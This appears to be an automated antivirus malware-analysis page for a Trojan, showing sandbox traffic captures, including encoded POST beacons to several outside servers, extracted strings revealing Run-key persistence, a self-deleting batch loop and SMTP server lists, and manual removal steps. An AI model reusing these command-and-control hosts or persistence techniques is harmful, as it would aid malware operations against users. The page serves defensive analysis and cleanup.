Last-Modified: Sat, 1 Jul 2017 10:02:23 GMT
Expires: Sat, 8 Jul 2017 10:02:23 GMT
Date: Sat, 01 Jul 2017 11:16:50 GMT
Connection: keep-alive
0..........0..... .....0.....u0..q0.........-b.Ce.....>...Q....2017
0701100223Z0s0q0I0... ........z.xI.u.@....0..K.u....,.PA.....6a[J.k...
3...n.....D.r......D....20170701100223Z....20170708100223Z0...*.H.....
........).....=| @....o3....q..jd4...K.:v..h.|.I...&.. . ......FK. ...
q[n&I..r...%...b.. r/..m......1..#.......2v)u........O...*.......h2...
...j}..N...RR.Q.JKY...V.&...h.M......SRt.0...B`X........NE.sA. .x.*h;.
.....6..../....f...i3.s...(,..E..%...[.U._.....Ze.Q8.2....0...0...0...
.......pP.3....I....m..0...*.H........0X1.0...U....US1.0...U....GeoTru
st Inc.110/..U...(GeoTrust Primary Certification Authority0...16112200
0000Z..171214235959Z0d1.0...U....US1.0...U....GeoTrust Inc.1=0;..U...4
GeoTrust Primary CA OCSP-TGV Responder Certificate 50.."0...*.H.......
......0.........9....o%uu!p26[......~..$.I...p....#.k..?.I_.-"...~ROB.
MFG......B...^.^ ...D......".d.U.......{#..K'..&..u.&...q..Y.(..%s..R.
.o..M../.exn.....V...?..>$........~<X.i\...,........6i.......l.E
..e...\....tW..;.`.o.. ...I..}......`...........x..3.,..S..fY.....o...
...j0h0...U.%..0... .......0... .....0......0...U.......0.0...U.......
....0"..U....0...0.1.0...U....TGV-OFF-520...*.H..............>H....
....1.N......#...E.......:..- ......o..l._aa...K`7.<YXi..'......y..
.O..{.....z.......L..ee...........W.a.;.2.de.....A.....S..LAzB.H...I..
.*.7...t..CQ.._ ....Y.F^a4..n.*...w...y..d04.DpQ.........E..k.2.I.[...
..D.G....[D.{c.....Rw.. ..... W.........-...

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVTU55zB7YBNhaYi1WtGCOIGzJNQQUyqxd4ZAv8e+M1J81AeEBO6DOwXcCEH/F5wATxsli1UI2IKNKtL8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: hd.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 01 Jul 2017 11:17:30 GMT
Content-Type: application/ocsp-response
Content-Length: 1617
Connection: keep-alive
content-transfer-encoding: binary
cache-control: max-age=495039, public, no-transform, must-revalidate
last-modified: Fri, 30 Jun 2017 04:48:09 GMT
expires: Fri, 7 Jul 2017 04:48:09 GMT
0..M......F0..B.. .....0.....30../0.........Y......-.X......9..2017063
0044809Z0s0q0I0... .........MNy.....Zb-V.`. l.5....]../.....5...;...w.
........b.B6 .J......20170630044809Z....20170707044809Z0...*.H........
.......\|>d.P.....u.{*J<..8.c.i.b....k..........`p.[ov.|t&.a..,.
.S..>. .e...M?C.h.`.S.L%..0..*ygc....s..a#..._|0g...w.....Qx.,.~Exb
.>.D......7Q.W...V..O..r<.*.a.i......b4...9yJ...:.Pc.......3.*./
......B.....N.$z.v....Qbz.Ci.Po.B.s.~7....Op...$.i/.vGe...}...`..W...v
0..r0..n0..V..........|.b..DR.}.Q..0...*.H........0..1.0...U....US1.0.
..U....Symantec Corporation1.0...U....Symantec Trust Network1.0...U...
.Domain Validated SSL1&0$..U....Symantec Basic DV SSL CA - G20...17060
3000000Z..170901235959Z071503..U...,Symantec Basic DV SSL CA - G2 OCSP
Responder0.."0...*.H.............0.........k#G..P...x..E.8.h.|...?a.-
$F..C...I. .,A...H:c......#.d*../x..^A6.....H*..M....=....Q..{.}6..q..
Z...Ijq.6......."u..J.u`.]...cX........<...f^..1`(..`.0....G...^b.$
..b.AQ.O.........=QY.b4'.M...}...R........Z..u.d...[U/.....j.(2(u.Y.E.
....V.hbQG.q.......R1..........0...0... .....0......0"..U....0...0.1.0
...U....TGV-E-15050...U.#..0.....]../.....5...;...w0...U.........Y....
..-.X......90...U.......0.0...U.%..0... .......0...U...........0h..U.
.a0_0]..`.H...E....0N0#.. .........hXXps://d.symcb.com/cps0'.. .......
0... hXXps://d.symcb.com/rpa0...*.H................1x.Z.s ....../..x.
.S.B)....V...._J......7..u..pP.....uL.c;...B...i.`..%H@........;/p..8.
?.6H,.k...^....B`C.jtaa.m..Jtdhu ...s\HV.OE...................S..k

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: timeturkey.com
Connection: Keep-Alive
Cache-Control: no-cache

N84RYfyXzmjHNnlJpxMXt48McZmULNd 8Gg9JSPc8o7fQzdRfCFZL2J5Xrrmf2hqa4x7Jt4Cio81Ddp3ZKlaVfac4UsePzgD6GbSGE8gd0FN6 97 yCmPD33Q6OwwGoxr48uNXPuDw3tin/WAVJZanpKjouGJISE 5axlDSEsX0xpQJlcORTAuxka8HRPGCeF2dT5Mzl6SMkimRejryfPV49gVRTDPpsOKLtWpqXnDXq675X38 SXdXCoNDFJKblX9OVyPsvinnXZ/f0sQk3Td9fVKl9FFr74cBycpLR5x3r40Phi2IIST3wFqZ2miRmtQeNJZ2drHdNlEQXw5DWm eXhDkoDsByeODnZIgStdw378VGxeYDsRRaASe ujldVlqRXAz6q5mJ6Lc4 7VM24UmwupWFmK2B8vVVHZ5BkGdYIDdZ 56l5DO
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 16:11:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 114
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head><META HTTP-EQUIV="Refresh" CONTENT="0;URL=h
ttp://VVV.americanlife.com.tr"></head><body></body&g
t;</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigtopmultimedia.com
Connection: Keep-Alive
Cache-Control: no-cache

rV3VuIW2w2C4abmorDYV9P5wM15TDMS/iRNiBZW9iWrOlaPxAC b4a CCSe0UZjiFyoC00tp5B3uRJy0pE38pg5RxJ4po5/tfw2io8YZ2Zsm1NLnVPICMR1L9Z8mjnHTsQQScu IQZU8IE/OPfDJcgAVwY2LCPqeeDtuwUkMtodgloHNNQlA7z0lchSziSvHGyvGuDgRNPa3e2b8nTsDSxjIxAtd123nQGGLIHu89C9ow63hW3rwiY0Lv8l8yhYSJ99blF68MjpV33LCFjJzCIOOUBQjlse/l1SJPZ YTeRgYuKwRVtn7abpka/fmhE8BRpmMEw6hj9VUIovskmTuJXEh1 WbTn3uzm7L0AxfE/a2NXxFLd0rZCff/pUm3b3Q307kiMaftZwa1L2ArOmes2lYtKjW15m/kvUN6eiUdfCf193K/qYp1IDSpYHr0fq2hCwUAr37ebDru1nktA6NXY5y1lBNBk8/8uaxqBLlj//kxYOySAJCPd1
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:41 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db3dc2d53ea557213c1fe145234af631c1498907801; expires=Sun, 01-Jul-18 11:16:41 GMT; path=/; domain=.bigtopmultimedia.com; HttpOnly
Location: hXXp://bigtopmultimedia.net/
Cache-Control: max-age=86400
Expires: Sun, 02 Jul 2017 11:16:41 GMT
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 3778f45ea3fa8261-KBP
131..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://bigtopmultimedia.net/">he
re</a>.</p>.<hr>.<address>Apache Server at big
topmultimedia.com Port 80</address>.</body></html>..
1.....0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:16:
41 GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Encoding
: chunked..Connection: keep-alive..Set-Cookie: __cfduid=db3dc2d53ea557
213c1fe145234af631c1498907801; expires=Sun, 01-Jul-18 11:16:41 GMT; pa
th=/; domain=.bigtopmultimedia.com; HttpOnly..Location: hXXp://bigtopm
ultimedia.net/..Cache-Control: max-age=86400..Expires: Sun, 02 Jul 201
7 11:16:41 GMT..Vary: Accept-Encoding..Server: cloudflare-nginx..CF-RA
Y: 3778f45ea3fa8261-KBP..131..<!DOCTYPE HTML PUBLIC "-//IETF//DTD H
TML 2.0//EN">.<html><head>.<title>301 Moved Perma
nently</title>.</head><body>.<h1>Moved Permane
ntly</h1>.<p>The document has moved <a href="hXXp://big
topmultimedia.net/">here</a>.</p>.<hr>.<addres
s>Apache Server at bigtopmultimedia.com Port 80</address>.<
;/body></html>..1.....0..
....

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigtopmultimedia.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=db3dc2d53ea557213c1fe145234af631c1498907801

XYQSxnT67WU1U8c9z OisMctzExsLCwo6H6WmFYOmecFDPq/I/W4oWrNng0987G1lyw QGq2lpeyokf9JAu06EAgkZHL4KTtkOCKF2uBqOy8CzMXR7eOQzilDrTLB/uhxTs11UAcCCSt2ut5ClidQHT5simjJBxtO6K23EjTSuggRyHWLPgfJGmEME/PZHnxjbi60ltK4jabRtgpRaReJ3k3/7/YKeUSfRG3w7sCZvvICYpPpIRpY9JYMHbvqJXtpD8yaCOG7GUKFGcg5kL2JP0Hpw8U0rHLHM7W1wNJTLz3yG//USRiKsdd7W4NuEL49W2TNV/ Jvyq jQYOlAStT1KolXdb/pvjpdmxERiURJtSSVNhXmI ijW8HxBKzG 7jm56iHSuwThGDuqaimNTbJXOFcyqbXWFoiXsqZFFtnYWlxg25mJC6upNAYtCQloD9TCVh5cOMFOWq2de lAAtNtjcT8F3oWNXJCUnjyIB0LufR0vD2duym3qpgX5uT4IsE=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:47 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://bigtopmultimedia.net/
Cache-Control: max-age=86400
Expires: Sun, 02 Jul 2017 11:16:47 GMT
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 3778f484006b8261-KBP
131..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://bigtopmultimedia.net/">he
re</a>.</p>.<hr>.<address>Apache Server at big
topmultimedia.com Port 80</address>.</body></html>..
1.....0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:16:
47 GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Encoding
: chunked..Connection: keep-alive..Location: hXXp://bigtopmultimedia.n
et/..Cache-Control: max-age=86400..Expires: Sun, 02 Jul 2017 11:16:47
GMT..Vary: Accept-Encoding..Server: cloudflare-nginx..CF-RAY: 3778f484
006b8261-KBP..131..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN
">.<html><head>.<title>301 Moved Permanently</
title>.</head><body>.<h1>Moved Permanently</h1
>.<p>The document has moved <a href="hXXp://bigtopmultimed
ia.net/">here</a>.</p>.<hr>.<address>Apache
Server at bigtopmultimedia.com Port 80</address>.</body>&
lt;/html>..1.....0..

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shbrazil.com
Connection: Keep-Alive
Cache-Control: no-cache

ju5EjHKQRWBjkNTcpbWm8nV FaxCFXCwxqWZPz86eVjbHLa/GeI Dv3Xtpy7R3zee8VNW2zqALqldMfXOkcmFICAhXyx8J4pa6h6mZxS7QCoQjFVjgId1kizxoHN70g U/BhqOmB4aWhrIcj8TjQx3I6DJMDqvUg/NA0iEdFaK5NAjmcpo019tQ/J XY tTo TnTVmFfaFvpgPzPRh/hSSFMauI2WPO YP79x1iAT zNdfTXo4uW7DxlPr2inbI1XY5fPCH6G2kysjW2DIWDeOaXw4UVuiJx CIAAsFQky3UwKMuwdovklw9Za4ETJIVTuO1okx4ZW2yPZIaQWE2EyZ/uFjKSlVBlx5 GnWnZzo2xPpYMXkH3P 9TIecJyAapLeEVk6Y5PJYSaN5pZ6VI5CT21cqt YnnyPe7Q3QlqEIVVQfzFb4cfLM60xl MngwNBRrLN07kq1MZJxWrilmAUHBCi2HombDhvhaZi9hA==
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.shbrazil.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Length: 147
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.shbrazil.com/">here</a></body>HTT
P/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..L
ocation: hXXp://VVV.shbrazil.com/..Server: Microsoft-IIS/8.5..X-Powere
d-By: ASP.NET..Date: Sat, 01 Jul 2017 11:16:39 GMT..Content-Length: 14
7..<head><title>Document Moved</title></head>.
<body><h1>Object Moved</h1>This document may be foun
d <a HREF="hXXp://VVV.shbrazil.com/">here</a></body>
..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.patentauction.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Set-Cookie: 240planBAK=R2339305415; path=/; expires=Sat, 01-Jul-2017 12:17:42 GMT
Date: Sat, 01 Jul 2017 11:16:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Set-Cookie: 240plan=R3762668425; path=/; expires=Sat, 01-Jul-2017 12:28:46 GMT
Server: Apache
Location: hXXps://VVV.patentauction.com/
Vary: Accept-Encoding
X-IPLB-Instance: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://VVV.patentauction.com/">here</a>.</p>.<
;/body></html>.HTTP/1.1 302 Found..Set-Cookie: 240planBAK=R23
39305415; path=/; expires=Sat, 01-Jul-2017 12:17:42 GMT..Date: Sat, 01
Jul 2017 11:16:56 GMT..Content-Type: text/html; charset=iso-8859-1..C
ontent-Length: 214..Set-Cookie: 240plan=R3762668425; path=/; expires=S
at, 01-Jul-2017 12:28:46 GMT..Server: Apache..Location: hXXps://VVV.pa
tentauction.com/..Vary: Accept-Encoding..X-IPLB-Instance: 341..<!DO
CTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head
>.<title>302 Found</title>.</head><body>.&l
t;h1>Found</h1>.<p>The document has moved <a href="h
ttps://VVV.patentauction.com/">here</a>.</p>.</body&
gt;</html>...


GET /pki/mscorp/crl/MSIT Machine Auth CA 2(1).crl HTTP/1.1
Cache-Control: max-age = 6793
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 18 Nov 2013 23:37:31 GMT
If-None-Match: "b61f5b26b7e4ce1:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: mscrl.microsoft.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-MD5: PC/LpWf3m7ZNoFodP8tYfA==
Content-Type: application/octet-stream
Date: Sat, 01 Jul 2017 11:17:36 GMT
Etag: 0x8D48E5CB3E8E42A
Last-Modified: Fri, 28 Apr 2017 17:33:37 GMT
Server: ECAcc (frf/8715)
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 5566d7ea-0001-0060-0d80-f00252000000
x-ms-version: 2009-09-19
Content-Length: 163018
0..|.0..{....0...*.H........0..1.0.....&...,d....com1.0.....&...,d....
microsoft1.0.....&...,d....corp1.0.....&...,d....redmond1.0...U....MSI
T Machine Auth CA 2..160608162453Z..160616164453Z0..z.0)....=.........
130522112904Z0.0...U.......0).....3........130522112904Z0.0...U.......
0)..M.\.........130522100146Z0.0...U.......0)....K.........13052210014
5Z0.0...U.......0)...........Z..130522100145Z0.0...U.......0).....j...
..I..130522100145Z0.0...U.......0)....q.....q...130522094611Z0.0...U..
.....0).....C....q=..130522055646Z0.0...U.......0)..P.......j...130522
055646Z0.0...U.......0)..c.......:...130522053344Z0.0...U.......0)..[.
.x....F0..130521142635Z0.0...U.......0)..[.......F...130521142635Z0.0.
..U.......0)..`.ii....9...130521142635Z0.0...U.......0)..`.X.....9...1
30521142635Z0.0...U.......0)..[.......F/..130521142143Z0.0...U.......0
).....9....p...130520132837Z0.0...U.......0)..Q.4u....]...130520115050
Z0.0...U.......0).....p....p...130520110806Z0.0...U.......0)...z......
fQ..130520094526Z0.0...U.......0)..........e...130520094526Z0.0...U...
....0)..........e...130520094526Z0.0...U.......0)... K.....p...1305200
94519Z0.0...U.......0)... H.....p...130520094519Z0.0...U.......0)...zF
,....o...130520070955Z0.0...U.......0)..f..E....P...130518074816Z0.0..
.U.......0...\,jN....FD..130402211200Z0...../w....U...130328232900Z0..
.p.R.....G1..130226223400Z0....e......?...130220163500Z0....[......*..
.121221223500Z0...A......."...121206221900Z0...A......."...12120622190
0Z0...A......."...121206221800Z0...A..\...."...121206221700Z0...A.

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2624:

.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
hXXp://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
hXXp://%s/
InternetOpenUrlA
-9276543007814
%fZ#<j
C:\Users\"%CurrentUserName%"\tebufsufeapa.exe
5a05d.exe
53595`5}5
9-9K9}9
?$?(?,?0?4?

%original file name%.exe_2624_rwx_04000000_0000F000:

.text
`.rdata
@.data
.reloc
software\microsoft\windows\currentversion\run
%s\%s.exe
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
software\microsoft\windows\currentversion
del %s
if exist %s goto :repeat
hXXp://%s
kernel32.dll
smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
CRYPT32.dll
PSAPI.DLL
USERENV.dll
IPHLPAPI.DLL
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
CryptExportKey
CryptGenKey
ADVAPI32.dll
ole32.dll
hXXp://%s/
InternetOpenUrlA
-9276543007814
%fZ#<j
C:\Users\"%CurrentUserName%"\tebufsufeapa.exe
5a05d.exe
53595`5}5
9-9K9}9
?$?(?,?0?4?


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3676

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3457FDAA13DF726057FF405C2970DA8B (1054 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\itgsolutions_nl[1].htm (694 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\MZJ4C755.txt (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\62B37F20965376D7AE7A52389623ED72 (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05C228D5A90F8E552A04359DBA3E6884 (364 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CGMU6O9X.txt (249 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab203.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (104 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\17FE92B829E591BC459ACE26B928A914 (2646 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\combine_or_id[1].htm (10354 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar204.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\alternative-aquitaine_co_uk[1].htm (248 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0255CEC2C51D081EFF40366512890989_791739868612F2F571F41B54D1643609 (944 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87CD74335D81E59B3AD1335BFD4C2A0E (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kafrit_com[1].htm (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QSV3FF8R.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A (736 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YKOEJOCX.txt (83 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE8390C335990B3814546A790944878B (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\17FE92B829E591BC459ACE26B928A914 (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WG6F7F7A.txt (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87CD74335D81E59B3AD1335BFD4C2A0E (360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D2E70F910D3215B7410B46A6E8BBA6B5 (2184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar14EE.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\678B9F95B126F50368710CA85CB2F3DA_AB8D94F29896452B4806732E3EB7F2B7 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D27C82366D91771CBE95D6164650B7EB (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\pferd_com[1].htm (291 bytes)
    C:\Users\"%CurrentUserName%"\tebufsufeapa.exe (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O9QM8YOH.txt (101 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6TEFDBE7.txt (1132 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WXZZNY49.txt (121 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA (1472 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (4816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\RE070MB2.txt (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BD5208ADDEC1165FD57AF2BF2F455EAA_7E3FFE794FF28BFE1B1F173FDFF37406 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\RMK71TC0.txt (129 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EED293ME.txt (324 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CMJBW712.txt (279 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08 (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CMQU8KEN.txt (370 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\83KRSCD5.txt (68 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\wp[1].htm (236 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9EC3B71635F8BA3FC68DE181A104A0EF_F6C39EF89D8A3A72327D8412589658B2 (471 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A7J9LGMN.txt (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\pferd_com[1].htm (291 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_4CE1C8FADD10DC56D6C641AD452A20BD (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IDM204RI.txt (316 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LBCCV48U.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GHP7CYS.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TW4ZIEEZ.txt (616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3A7IHOLU.txt (246 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BNGT7O4L.txt (87 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05C228D5A90F8E552A04359DBA3E6884 (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_2B618FC6CF84AEF3C14E129161BF18D9 (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KH07RBI1.txt (120 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7RNXQXPU.txt (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C9E3282A673263848AB7F0C007FD3AF1_A8B7EB8E1B4EFC36EE88BC2F4B7529BF (2646 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4FREVB0A.txt (121 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2A1C.tmp (52 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\meubles-jacquelin_com[1].htm (5911 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6JDQWYI7.txt (97 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\cbsprinting_com_au[1].htm (8177 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab14ED.tmp (51 bytes)
